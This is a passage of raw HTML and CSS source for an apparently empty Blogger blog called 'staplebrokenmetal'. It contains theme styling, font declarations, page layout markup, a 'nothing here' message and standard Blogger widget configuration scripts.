U+1F44C-1F44E,U+1F453,U+1F46A,U+1F47D,U+1F4A3,U+1F4B0,U+1F4B3,U+1F4B9,U+1F4BB,U+1F4BF,U+1F4C8-1F4CB,U+1F4D6,U+1F4DA,U+1F4DF,U+1F4E3-1F4E6,U+1F4EA-1F4ED,U+1F4F7,U+1F4F9-1F4FB,U+1F4FD-1F4FE,U+1F503,U+1F507-1F50B,U+1F50D,U+1F512-1F513,U+1F53E-1F54A,U+1F54F-1F5FA,U+1F610,U+1F650-1F67F,U+1F687,U+1F68D,U+1F691,U+1F694,U+1F698,U+1F6AD,U+1F6B2,U+1F6B9-1F6BA,U+1F6BC,U+1F6C6-1F6CF,U+1F6D3-1F6D7,U+1F6E0-1F6EA,U+1F6F0-1F6F3,U+1F6F7-1F6FC,U+1F700-1F7FF,U+1F800-1F80B,U+1F810-1F847,U+1F850-1F859,U+1F860-1F887,U+1F890-1F8AD,U+1F8B0-1F8BB,U+1F8C0-1F8C1,U+1F900-1F90B,U+1F93B,U+1F946,U+1F984,U+1F996,U+1F9E9,U+1FA00-1FA6F,U+1FA70-1FA7C,U+1FA80-1FA89,U+1FA8F-1FAC6,U+1FACE-1FADC,U+1FADF-1FAE9,U+1FAF0-1FAF8,U+1FB00-1FBFF;}@font-face{font-family:'Roboto';font-style:normal;font-weight:7
00;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3OUBGEe.woff2)format('woff2');unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB;}@font-face{font-family:'Roboto';font-style:normal;font-weight:700;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3KUBGEe.woff2)format('woff2');unicode-range:U+0100-02BA,U+02BD-02C5,U+02C7-02CC,U+02CE-02D7,U+02DD-02FF,U+0304,U+0308,U+0329,U+1D00-1DBF,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20C0,U+2113,U+2C60-2C7F,U+A720-A7FF;}@font-face{font-family:'Roboto';font-style:normal;font-weight:700;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2)format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD;}</style>\n<style id='page-skin-1' type='text/css'><!--\n/*! 
.post-outer{\nborder:0;\nposition:relative;\npadding-bottom:.25em\n}\n.post-outer-container{\nmargin-bottom:16px\n}\n.post:first-child{\nmargin-top:0\n}\n.post .thumb{\nfloat:left;\nheight:20%;\nwidth:20%\n}\n.post-share-buttons-bottom,.post-share-buttons-top{\nfloat:right\n}\n.post-share-buttons-bottom{\nmargin-right:24px\n}\n.post-footer,.post-header{\nclear:left;\ncolor:rgba(0, 0, 0, 0.54);\nmargin:0;\nwidth:inherit\n}\n.blog-pager{\ntext-align:center\n}\n.blog-pager a{\ncolor:#2196f3\n}\n.blog-pager a:visited{\ncolor:#2196f3\n}\n.blog-pager a:hover{\ncolor:#2196f3\n}\n.post-title{\nfont:bold 22px Roboto, sans-serif;\nfloat:left;\nmargin:0 0 8px 0;\nmax-width:calc(100% - 48px)\n}\n.post-title a{\nfont:bold 30px Roboto, sans-serif\n}\n.post-title,.post-title a,.post-title a:hover,.post-title a:visited{\ncolor:#212121\n}\n.post-body{\ncolor:#757575;\nfont:15px Roboto, sans-serif;\nline-height:1.6em;\nmargin:1.5em 0 2em 0;\ndisplay:block\n}\n.post-body img{\nheight:inherit\n}\n.post-body .snippet-thumbnail{\nfloat:left;\nmargin:0;\nmargin-right:2em;\nmax-height:128px;\nmax-width:128px\n}\n.post-body .snippet-thumbnail img{\nmax-width:100%\n}\n.main .FeaturedPost .widget-content{\nborder:0;\nposition:relative;\npadding-bottom:.25em\n}\n.FeaturedPost img{\nmargin-top:2em\n}\n.FeaturedPost .snippet-container{\nmargin:2em 0\n}\n.FeaturedPost .snippet-container p{\nmargin:0\n}\n.FeaturedPost .snippet-thumbnail{\nfloat:none;\nheight:auto;\nmargin-bottom:2em;\nmargin-right:0;\noverflow:hidden;\nmax-height:calc(600px + 2em);\nmax-width:100%;\ntext-align:center;\nwidth:100%\n}\n.FeaturedPost .snippet-thumbnail img{\nmax-width:100%;\nwidth:100%\n}\n.byline{\ncolor:rgba(0, 0, 0, 0.54);\ndisplay:inline-block;\nline-height:24px;\nmargin-top:8px;\nvertical-align:top\n}\n.byline.post-author:first-child{\nmargin-right:0\n}\n.byline.reactions 
.reactions-label{\nline-height:22px;\nvertical-align:top\n}\n.byline.post-share-buttons{\nposition:relative;\ndisplay:inline-block;\nmargin-top:0;\nwidth:100%\n}\n.byline.post-share-buttons .sharing{\nfloat:right\n}\n.flat-button.ripple:hover{\nbackground-color:rgba(33,150,243,.12)\n}\n.flat-button.ripple .splash{\nbackground-color:rgba(33,150,243,.4)\n}\na.timestamp-link,a:active.timestamp-link,a:visited.timestamp-link{\ncolor:inherit;\nfont:inherit;\ntext-decoration:inherit\n}\n.post-share-buttons{\nmargin-left:0\n}\n.clear-sharing{\nmin-height:24px\n}\n.comment-link{\ncolor:#2196f3;\nposition:relative\n}\n.comment-link .num_comments{\nmargin-left:8px;\nvertical-align:top\n}\n#comment-holder .continue{\ndisplay:none\n}\n#comment-editor{\nmargin-bottom:20px;\nmargin-top:20px\n}\n#comments .comment-form h4,#comments h3.title{\nposition:absolute;\nclip:rect(1px,1px,1px,1px);\npadding:0;\nborder:0;\nheight:1px;\nwidth:1px;\noverflow:hidden\n}\n.post-filter-message{\nbackground-color:rgba(0,0,0,.7);\ncolor:#fff;\ndisplay:table;\nmargin-bottom:16px;\nwidth:100%\n}\n.post-filter-message div{\ndisplay:table-cell;\npadding:15px 28px\n}\n.post-filter-message div:last-child{\npadding-left:0;\ntext-align:right\n}\n.post-filter-message a{\nwhite-space:nowrap\n}\n.post-filter-message .search-label,.post-filter-message .search-query{\nfont-weight:700;\ncolor:#2196f3\n}\n#blog-pager{\nmargin:2em 0\n}\n#blog-pager a{\ncolor:#2196f3;\nfont-size:14px\n}\n.subscribe-button{\nborder-color:#ffffff;\ncolor:#ffffff\n}\n.sticky .subscribe-button{\nborder-color:#757575;\ncolor:#757575\n}\n.tabs{\nmargin:0 auto;\npadding:0\n}\n.tabs li{\nmargin:0 8px;\nvertical-align:top\n}\n.tabs .overflow-button a,.tabs li a{\ncolor:#cccccc;\nfont:700 normal 15px Roboto, sans-serif;\nline-height:18px\n}\n.tabs .overflow-button a{\npadding:12px 8px\n}\n.overflow-popup .tabs li{\ntext-align:left\n}\n.overflow-popup li a{\ncolor:#757575;\ndisplay:block;\npadding:8px 20px\n}\n.overflow-popup li.selected 
a{\ncolor:#212121\n}\na.report_abuse{\nfont-weight:400\n}\n.Label li,.Label span.label-size,.byline.post-labels a{\nbackground-color:#f7f7f7;\nborder:1px solid #f7f7f7;\nborder-radius:15px;\ndisplay:inline-block;\nmargin:4px 4px 4px 0;\npadding:3px 8px\n}\n.Label a,.byline.post-labels a{\ncolor:rgba(0,0,0,0.54)\n}\n.Label ul{\nlist-style:none;\npadding:0\n}\n.PopularPosts{\nbackground-color:#eeeeee;\npadding:30px 40px\n}\n.PopularPosts .item-content{\ncolor:#757575;\nmargin-top:24px\n}\n.PopularPosts a,.PopularPosts a:hover,.PopularPosts a:visited{\ncolor:#2196f3\n}\n.PopularPosts .post-title,.PopularPosts .post-title a,.PopularPosts .post-title a:hover,.PopularPosts .post-title a:visited{\ncolor:#212121;\nfont-size:18px;\nfont-weight:700;\nline-height:24px\n}\n.PopularPosts,.PopularPosts h3.title a{\ncolor:#757575;\nfont:15px Roboto, sans-serif\n}\n.main .PopularPosts{\npadding:16px 40px\n}\n.PopularPosts h3.title{\nfont-size:14px;\nmargin:0\n}\n.PopularPosts h3.post-title{\nmargin-bottom:0\n}\n.PopularPosts .byline{\ncolor:rgba(0, 0, 0, 0.54)\n}\n.PopularPosts .jump-link{\nfloat:right;\nmargin-top:16px\n}\n.PopularPosts .post-header .byline{\nfont-size:.9em;\nfont-style:italic;\nmargin-top:6px\n}\n.PopularPosts ul{\nlist-style:none;\npadding:0;\nmargin:0\n}\n.PopularPosts .post{\npadding:20px 0\n}\n.PopularPosts .post+.post{\nborder-top:1px dashed #cccccc\n}\n.PopularPosts .item-thumbnail{\nfloat:left;\nmargin-right:32px\n}\n.PopularPosts .item-thumbnail img{\nheight:88px;\npadding:0;\nwidth:88px\n}\n.inline-ad{\nmargin-bottom:16px\n}\n.desktop-ad .inline-ad{\ndisplay:block\n}\n.adsbygoogle{\noverflow:hidden\n}\n.vertical-ad-container{\nfloat:right;\nmargin-right:16px;\nwidth:128px\n}\n.vertical-ad-container .AdSense+.AdSense{\nmargin-top:16px\n}\n.inline-ad-placeholder,.vertical-ad-placeholder{\nbackground:#ffffff;\nborder:1px solid #000;\nopacity:.9;\nvertical-align:middle;\ntext-align:center\n}\n.inline-ad-placeholder span,.vertical-ad-placeholder 
span{\nmargin-top:290px;\ndisplay:block;\ntext-transform:uppercase;\nfont-weight:700;\ncolor:#212121\n}\n.vertical-ad-placeholder{\nheight:600px\n}\n.vertical-ad-placeholder span{\nmargin-top:290px;\npadding:0 40px\n}\n.inline-ad-placeholder{\nheight:90px\n}\n.inline-ad-placeholder span{\nmargin-top:36px\n}\n.Attribution{\ncolor:#757575\n}\n.Attribution a,.Attribution a:hover,.Attribution a:visited{\ncolor:#2196f3\n}\n.Attribution svg{\nfill:#707070\n}\n.sidebar-container{\nbox-shadow:1px 1px 3px rgba(0,0,0,.1)\n}\n.sidebar-container,.sidebar-container .sidebar_bottom{\nbackground-color:#ffffff\n}\n.sidebar-container .navigation,.sidebar-container .sidebar_top_wrapper{\nbackground-color:#ffffff\n}\n.sidebar-container .sidebar_top{\noverflow:auto\n}\n.sidebar-container .sidebar_bottom{\nwidth:100%;\npadding-top:16px\n}\n.sidebar-container .widget:first-child{\npadding-top:0\n}\n.sidebar_top .widget.Profile{\npadding-bottom:16px\n}\n.widget.Profile{\nmargin:0;\nwidth:100%\n}\n.widget.Profile h2{\ndisplay:none\n}\n.widget.Profile h3.title{\ncolor:rgba(0,0,0,0.52);\nmargin:16px 32px\n}\n.widget.Profile .individual{\ntext-align:center\n}\n.widget.Profile .individual .profile-link{\npadding:1em\n}\n.widget.Profile .individual .default-avatar-wrapper .avatar-icon{\nmargin:auto\n}\n.widget.Profile .team{\nmargin-bottom:32px;\nmargin-left:32px;\nmargin-right:32px\n}\n.widget.Profile ul{\nlist-style:none;\npadding:0\n}\n.widget.Profile li{\nmargin:10px 0\n}\n.widget.Profile .profile-img{\nborder-radius:50%;\nfloat:none\n}\n.widget.Profile .profile-link{\ncolor:#212121;\nfont-size:.9em;\nmargin-bottom:1em;\nopacity:.87;\noverflow:hidden\n}\n.widget.Profile .profile-link.visit-profile{\nborder-style:solid;\nborder-width:1px;\nborder-radius:12px;\ncursor:pointer;\nfont-size:12px;\nfont-weight:400;\npadding:5px 20px;\ndisplay:inline-block;\nline-height:normal\n}\n.widget.Profile dd{\ncolor:rgba(0, 0, 0, 0.54);\nmargin:0 16px\n}\n.widget.Profile 
location{\nmargin-bottom:1em\n}\n.widget.Profile .profile-textblock{\nfont-size:14px;\nline-height:24px;\nposition:relative\n}\nbody.sidebar-visible .page_body{\noverflow-y:scroll\n}\nbody.sidebar-visible .bg-photo-container{\noverflow-y:scroll\n}\n@media screen and (min-width:1440px){\n.sidebar-container{\nmargin-top:480px;\nmin-height:calc(100% - 480px);\noverflow:visible;\nz-index:32\n}\n.sidebar-container .sidebar_top_wrapper{\nbackground-color:#f7f7f7;\nheight:480px;\nmargin-top:-480px\n}\n.sidebar-container .sidebar_top{\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex;\nheight:480px;\n-webkit-box-orient:horizontal;\n-webkit-box-direction:normal;\n-webkit-flex-direction:row;\n-ms-flex-direction:row;\nflex-direction:row;\nmax-height:480px\n}\n.sidebar-container .sidebar_bottom{\nmax-width:284px;\nwidth:284px\n}\nbody.collapsed-header .sidebar-container{\nz-index:15\n}\n.sidebar-container .sidebar_top:empty{\ndisplay:none\n}\n.sidebar-container .sidebar_top>:only-child{\n-webkit-box-flex:0;\n-webkit-flex:0 0 auto;\n-ms-flex:0 0 auto;\nflex:0 0 auto;\n-webkit-align-self:center;\n-ms-flex-item-align:center;\nalign-self:center;\nwidth:100%\n}\n.sidebar_top_wrapper.no-items{\ndisplay:none\n}\n}\n.post-snippet.snippet-container{\nmax-height:120px\n}\n.post-snippet .snippet-item{\nline-height:24px\n}\n.post-snippet .snippet-fade{\nbackground:-webkit-linear-gradient(left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%);\nbackground:linear-gradient(to left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%);\ncolor:#757575;\nheight:24px\n}\n.popular-posts-snippet.snippet-container{\nmax-height:72px\n}\n.popular-posts-snippet .snippet-item{\nline-height:24px\n}\n.PopularPosts .popular-posts-snippet .snippet-fade{\ncolor:#757575;\nheight:24px\n}\n.main .popular-posts-snippet .snippet-fade{\nbackground:-webkit-linear-gradient(left,#eeeeee 0,#eeeeee 20%,rgba(238, 238, 238, 0) 100%);\nbackground:linear-gradient(to left,#eeeeee 0,#eeeeee 
20%,rgba(238, 238, 238, 0) 100%)\n}\n.sidebar_bottom .popular-posts-snippet .snippet-fade{\nbackground:-webkit-linear-gradient(left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%);\nbackground:linear-gradient(to left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%)\n}\n.profile-snippet.snippet-container{\nmax-height:192px\n}\n.has-location .profile-snippet.snippet-container{\nmax-height:144px\n}\n.profile-snippet .snippet-item{\nline-height:24px\n}\n.profile-snippet .snippet-fade{\nbackground:-webkit-linear-gradient(left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%);\nbackground:linear-gradient(to left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%);\ncolor:rgba(0, 0, 0, 0.54);\nheight:24px\n}\n@media screen and (min-width:1440px){\n.profile-snippet .snippet-fade{\nbackground:-webkit-linear-gradient(left,#f7f7f7 0,#f7f7f7 20%,rgba(247, 247, 247, 0) 100%);\nbackground:linear-gradient(to left,#f7f7f7 0,#f7f7f7 20%,rgba(247, 247, 247, 0) 100%)\n}\n}\n@media screen and (max-width:800px){\n.blog-name{\nmargin-top:0\n}\nbody.item-view .blog-name{\nmargin:0 48px\n}\n.centered-bottom{\npadding:8px\n}\nbody.item-view .centered-bottom{\npadding:0\n}\n.page_body .centered{\npadding:10px 0\n}\nbody.item-view #header,body.item-view .widget.Header{\nmargin-right:0\n}\nbody.collapsed-header .centered-top-container .blog-name{\ndisplay:block\n}\nbody.collapsed-header .centered-top-container .widget.Header h1{\ntext-align:center\n}\n.widget.Header header{\npadding:0\n}\n.widget.Header h1{\nfont-size:24px;\nline-height:24px;\nmargin-bottom:13px\n}\nbody.item-view .widget.Header h1{\ntext-align:center\n}\nbody.item-view .widget.Header p{\ntext-align:center\n}\n.blog-name .widget.PageList{\npadding:0\n}\nbody.item-view .centered-top{\nmargin-bottom:5px\n}\n.search-action,.search-input{\nmargin-bottom:-8px\n}\n.search form{\nmargin-bottom:8px\n}\nbody.item-view .subscribe-section-container{\nmargin:5px 0 0 0;\nwidth:100%\n}\n#page_body.section 
div.widget.FeaturedPost,div.widget.PopularPosts{\npadding:16px\n}\ndiv.widget.Blog .blog-posts .post-outer-container{\npadding:16px\n}\ndiv.widget.Blog .blog-posts .post-outer-container .post-outer{\npadding:0\n}\n.post:first-child{\nmargin:0\n}\n.post-body .snippet-thumbnail{\nmargin:0 3vw 3vw 0\n}\n.post-body .snippet-thumbnail img{\nheight:20vw;\nwidth:20vw;\nmax-height:128px;\nmax-width:128px\n}\ndiv.widget.PopularPosts div.item-thumbnail{\nmargin:0 3vw 3vw 0\n}\ndiv.widget.PopularPosts div.item-thumbnail img{\nheight:20vw;\nwidth:20vw;\nmax-height:88px;\nmax-width:88px\n}\n.post-title{\nline-height:1\n}\n.post-title,.post-title a{\nfont-size:20px\n}\n#page_body.section div.widget.FeaturedPost h3 a{\nfont-size:22px\n}\n.mobile-ad .inline-ad{\ndisplay:block\n}\n.page_body.has-vertical-ads .vertical-ad-container,.page_body.has-vertical-ads .vertical-ad-container ins{\ndisplay:none\n}\n.page_body.has-vertical-ads .centered .centered-bottom,.page_body.has-vertical-ads .centered .centered-top{\ndisplay:block;\nwidth:auto\n}\ndiv.post-filter-message div{\npadding:8px 16px\n}\n}\n@media screen and (min-width:1440px){\nbody{\nposition:relative\n}\nbody.item-view .blog-name{\nmargin-left:48px\n}\n.page_body{\nmargin-left:284px\n}\n.search{\nmargin-left:0\n}\n.search.focused{\nwidth:100%\n}\n.sticky{\npadding-left:284px\n}\n.hamburger-menu{\ndisplay:none\n}\nbody.collapsed-header .page_body .centered-top-container{\npadding-left:284px;\npadding-right:0;\nwidth:100%\n}\nbody.collapsed-header .centered-top-container .search.focused{\nwidth:100%\n}\nbody.collapsed-header .centered-top-container .blog-name{\nmargin-left:0\n}\nbody.collapsed-header.item-view .centered-top-container .search.focused{\nwidth:calc(100% - 50px)\n}\nbody.collapsed-header.item-view .centered-top-container .blog-name{\nmargin-left:40px\n}\n}\n\n--></style>\n<style id='template-skin-1' type='text/css'><!--\nbody#layout .hidden,\nbody#layout .invisible {\ndisplay: inherit;\n}\nbody#layout .navigation 
{\ndisplay: none;\n}\nbody#layout .page,\nbody#layout .sidebar_top,\nbody#layout .sidebar_bottom {\ndisplay: inline-block;\nleft: inherit;\nposition: relative;\nvertical-align: top;\n}\nbody#layout .page {\nfloat: right;\nmargin-left: 20px;\nwidth: 55%;\n}\nbody#layout .sidebar-container {\nfloat: right;\nwidth: 40%;\n}\nbody#layout .hamburger-menu {\ndisplay: none;\n}\n--></style>\n<style>\n .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw);}\n \n@media (max-width: 480px) { .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw&options=w480);}}\n@media (max-width: 640px) and (min-width: 481px) { .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw&options=w640);}}\n@media (max-width: 800px) and (min-width: 641px) { .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw&options=w800);}}\n@media (max-width: 1200px) and (min-width: 801px) { .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw&options=w1200);}}\n/* Last tag covers anything over one higher than the previous max-size cap. 
*/\n@media (min-width: 1201px) { .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw&options=w1600);}}\n </style>\n<script async='async' src='https://www.gstatic.com/external_hosted/clipboardjs/clipboard.min.js'></script>\n<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>\n<meta name='google-adsense-platform-domain' content='blogspot.com'/>\n\n</head>\n<body class='version-1-3-3'>\n<a class='skip-navigation' href='#main' tabindex='0'>\nSkip to main content\n</a>\n<div class='page'>\n<div class='bg-photo-overlay'></div>\n<div class='bg-photo-container'>\n<div class='bg-photo'></div>\n</div>\n<div class='page_body'>\n<div class='centered'>\n<div class='centered-top-placeholder'></div>\n<header class='centered-top-container' role='banner'>\n<div class='centered-top'>\n<button class='svg-icon-24-button hamburger-menu flat-icon-button ripple'>\n<svg class='svg-icon-24'>\n<use xlink:href='/responsive/sprite_v1_6.css.svg#ic_menu_black_24dp' xmlns:xlink='http://www.w3.org/1999/xlink'></use>\n</svg>\n</button>\n<div class='search'>\n<button aria-label='Search' class='search-expand touch-icon-button'>\n<div class='flat-icon-button ripple'>\n<svg class='svg-icon-24 search-expand-icon'>\n<use xlink:href='/responsive/sprite_v1_6.css.svg#ic_search_black_24dp' xmlns:xlink='http://www.w3.org/1999/xlink'></use>\n</svg>\n</div>\n</button>\n<div class='section' id='search_top' name='Search (Top)'><div class='widget BlogSearch' data-version='2' id='BlogSearch1'>\n<h3 class='title'>\nSearch This Blog\n</h3>\n<div class='widget-content' role='search'>\n<form action='https://staplebrokenmetaliyro.blogspot.com/search' target='_top'>\n<div class='search-input'>\n<input aria-label='Search this blog' autocomplete='off' name='q' placeholder='Search this blog' value=''/>\n</div>\n<input class='search-action flat-button' type='submit' 
value='Search'/>\n</form>\n</div>\n</div></div>\n</div>\n<div class='clearboth'></div>\n<div class='blog-name container'>\n<div class='container section' id='header' name='Header'><div class='widget Header' data-version='2' id='Header1'>\n<div class='header-widget'>\n<div>\n<h1>\nstaplebrokenmetal\n</h1>\n</div>\n<p>\n</p>\n</div>\n</div></div>\n<nav role='navigation'>\n<div class='clearboth no-items section' id='page_list_top' name='Page List (Top)'>\n</div>\n</nav>\n</div>\n</div>\n</header>\n<div>\n<div class='vertical-ad-container no-items section' id='ads' name='Ads'>\n</div>\n<main class='centered-bottom' id='main' role='main' tabindex='-1'>\n<h2 class='main-heading'>Posts</h2>\n<div class='main section' id='page_body' name='Page Body'>\n<div class='widget Blog' data-version='2' id='Blog1'>\n<div class='blog-posts hfeed container'>\n<div class='post-outer-container'>\n<div class='no-posts-message'>\nThere's nothing here!\n</div>\n</div>\n</div>\n<div class='blog-posts hfeed container'>\n</div>\n<div class='blog-pager container' id='blog-pager'>\n</div>\n</div>\n</div>\n</main>\n</div>\n<footer class='footer section' id='footer' name='Footer'><div class='widget Attribution' data-version='2' id='Attribution1'>\n<div class='widget-content'>\n<div class='blogger'>\n<a href='https://www.blogger.com' rel='nofollow'>\n<svg class='svg-icon-24'>\n<use xlink:href='/responsive/sprite_v1_6.css.svg#ic_post_blogger_black_24dp' xmlns:xlink='http://www.w3.org/1999/xlink'></use>\n</svg>\nPowered by Blogger\n</a>\n</div>\n<div class='image-attribution'>\nTheme images by <a href=\"http://www.offset.com/photos/394244\">Michael Elkan</a>\n</div>\n</div>\n</div></footer>\n</div>\n</div>\n</div>\n<aside class='sidebar-container container sidebar-invisible' role='complementary'>\n<div class='navigation'>\n<button class='svg-icon-24-button flat-icon-button ripple sidebar-back'>\n<svg class='svg-icon-24'>\n<use xlink:href='/responsive/sprite_v1_6.css.svg#ic_arrow_back_black_24dp' 
xmlns:xlink='http://www.w3.org/1999/xlink'></use>\n</svg>\n</button>\n</div>\n<div class='sidebar_top_wrapper'>\n<div class='sidebar_top section' id='sidebar_top' name='Sidebar (Top)'><div class='widget Profile' data-version='2' id='Profile1'>\n<div class='wrapper solo'>\n<div class='widget-content individual'>\n<a href='https://www.blogger.com/profile/02686294779557843862' rel='nofollow'>\n<div class='default-avatar-wrapper'>\n<svg class='svg-icon-24 avatar-icon'>\n<use xlink:href='/responsive/sprite_v1_6.css.svg#ic_person_black_24dp' xmlns:xlink='http://www.w3.org/1999/xlink'></use>\n</svg>\n</div>\n</a>\n<div class='profile-info'>\n<dl class='profile-datablock'>\n<dt class='profile-data'>\n<a class='profile-link g-profile' href='https://www.blogger.com/profile/02686294779557843862' rel='author nofollow'>\nWeesepuld\n</a>\n</dt>\n</dl>\n<a class='profile-link visit-profile pill-button' href='https://www.blogger.com/profile/02686294779557843862' rel='author'>\nVisit profile\n</a>\n</div>\n</div>\n</div>\n</div></div>\n</div>\n<div class='sidebar_bottom section' id='sidebar_bottom' name='Sidebar (Bottom)'>\n<div class='widget ReportAbuse' data-version='2' id='ReportAbuse1'>\n<h3 class='title'>\n<a class='report_abuse' href='https://www.blogger.com/go/report-abuse' rel='noopener nofollow' target='_blank'>\nReport Abuse\n</a>\n</h3>\n</div></div>\n</aside>\n<script type=\"text/javascript\" src=\"https://resources.blogblog.com/blogblog/data/res/2705757678-indie_compiled.js\" async=\"true\"></script>\n\n<script type=\"text/javascript\" src=\"https://www.blogger.com/static/v1/widgets/1991725782-widgets.js\"></script>\n<script type='text/javascript'>\nwindow['__wavt'] = 'AOuZoY4GK2qUWpAkWP_wHeco6weR1gTmpQ:1745721693450';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\\x3d3967763303726818370','//staplebrokenmetaliyro.blogspot.com/','3967763303726818370');\n_WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '3967763303726818370', 'title': 
'staplebrokenmetal', 'url': 'https://staplebrokenmetaliyro.blogspot.com/', 'canonicalUrl': 'https://staplebrokenmetaliyro.blogspot.com/', 'homepageUrl': 'https://staplebrokenmetaliyro.blogspot.com/', 'searchUrl': 'https://staplebrokenmetaliyro.blogspot.com/search', 'canonicalHomepageUrl': 'https://staplebrokenmetaliyro.blogspot.com/', 'blogspotFaviconUrl': 'https://staplebrokenmetaliyro.blogspot.com/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': false, 'httpsEnabled': true, 'enabledCommentProfileImages': true, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': '', 'encoding': 'UTF-8', 'locale': 'en', 'localeUnderscoreDelimited': 'en', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'isDynamicViewsAvailable': true, 'feedLinks': '\\x3clink rel\\x3d\\x22alternate\\x22 type\\x3d\\x22application/atom+xml\\x22 title\\x3d\\x22staplebrokenmetal - Atom\\x22 href\\x3d\\x22https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default\\x22 /\\x3e\\n\\x3clink rel\\x3d\\x22alternate\\x22 type\\x3d\\x22application/rss+xml\\x22 title\\x3d\\x22staplebrokenmetal - RSS\\x22 href\\x3d\\x22https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default?alt\\x3drss\\x22 /\\x3e\\n\\x3clink rel\\x3d\\x22service.post\\x22 type\\x3d\\x22application/atom+xml\\x22 title\\x3d\\x22staplebrokenmetal - Atom\\x22 href\\x3d\\x22https://www.blogger.com/feeds/3967763303726818370/posts/default\\x22 /\\x3e\\n', 'meTag': '\\x3clink rel\\x3d\\x22me\\x22 href\\x3d\\x22https://www.blogger.com/profile/02686294779557843862\\x22 /\\x3e\\n', 'adsenseHostId': 'ca-host-pub-1556223355139109', 'adsenseHasAds': true, 'adsenseAutoAds': false, 'boqCommentIframeForm': true, 'loginRedirectParam': '', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': 
'//www.blogblog.com/dynamicviews/f28b5561d9d56e0d', 'plusOneApiSrc': 'https://apis.google.com/js/platform.js', 'disableGComments': true, 'interstitialAccepted': false, 'sharing': {'platforms': [{'name': 'Get link', 'key': 'link', 'shareMessage': 'Get link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Share to Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'X', 'key': 'twitter', 'shareMessage': 'Share to X', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Share to Pinterest', 'target': 'pinterest'}, {'name': 'Email', 'key': 'email', 'shareMessage': 'Email', 'target': 'email'}], 'disableGooglePlus': true, 'googlePlusShareButtonWidth': 0, 'googlePlusBootstrap': '\\x3cscript type\\x3d\\x22text/javascript\\x22\\x3ewindow.___gcfg \\x3d {\\x27lang\\x27: \\x27en\\x27};\\x3c/script\\x3e'}, 'hasCustomJumpLinkMessage': false, 'jumpLinkMessage': 'Read more', 'pageType': 'index', 'pageName': '', 'pageTitle': 'staplebrokenmetal'}}, {'name': 'features', 'data': {}}, {'name': 'messages', 'data': {'edit': 'Edit', 'linkCopiedToClipboard': 'Link copied to clipboard!', 'ok': 'Ok', 'postLink': 'Post Link'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Custom', 'isResponsive': true, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\\x3dsidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\\x3dsnapshot'}, 'timeslide': {'name': 